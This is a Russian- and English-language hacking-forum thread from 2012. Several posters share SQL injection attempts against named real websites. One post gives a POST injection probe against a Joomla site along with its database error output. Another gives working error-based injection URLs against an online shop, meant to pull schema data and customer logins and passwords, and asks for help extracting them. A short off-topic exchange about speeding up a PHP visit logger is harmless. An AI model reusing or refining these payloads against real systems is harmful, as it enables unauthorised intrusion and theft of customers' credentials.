08.03.2012, 17:45
|
|
Новичок
Регистрация: 13.01.2012
Сообщений: 6
С нами:
7542326
Репутация:
0
|
|
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.
Код:
task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:
Code:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html
Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344 |
|
|
08.03.2012, 22:41
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются
Сам код(пишу недавно за безграмотность не судить):
|
|
|
|
08.03.2012, 22:47
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Qwert321
Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются
Сам код(пишу недавно за безграмотность не судить):
Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.
|
|
|
|
08.03.2012, 22:51
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Сообщение от R0nin
Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.
сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё
|
|
|
|
08.03.2012, 22:59
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Qwert321
сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё
Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня:
- Каждый раз подключаться к DB, потом отключаться, и так покругу - глупо. Один раз подключись, построй свою систему, где будешь передавать уже действующий идентификатор подключения. Это намного ускорить твой код.
- Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).
- Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.
|
|
|
|
08.03.2012, 23:04
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.
|
|
|
|
08.03.2012, 23:07
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Сообщение от R0nin
Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня: - Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).
- Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.
urlencode от sql inj
Какие тут функции то делать код три строчки
|
|
|
|
08.03.2012, 23:10
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Сообщение от R0nin
Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.
действительно... сори модеров прошшу удалить сообщения... пойду искать другую ветку
|
|
|
|
08.03.2012, 23:24
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Qwert321
urlencode от sql inj
Какие тут функции то делать код три строчки
От SQL-inj используются другие функция. urlencode переведет все специальные знаки, а это не обязательно, чтобы защититься от SQL-inj.
|
|
|
|
08.03.2012, 23:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
а такой вопрос
чего тут емеил выводится нормально,
Сообщение от None
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+table_schema+from+information_schema.t ables+where+table_name=0x53435f637573746f6d657273% 29,0x00,floor%28rand%280%29*2%29%29having+min%280% 29+or+1--+
а логин и пароль невыводятся вобще
Сообщение от None
http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+Login+from+play_today.SC_customers+lim it+0,1%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
как их вывести? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
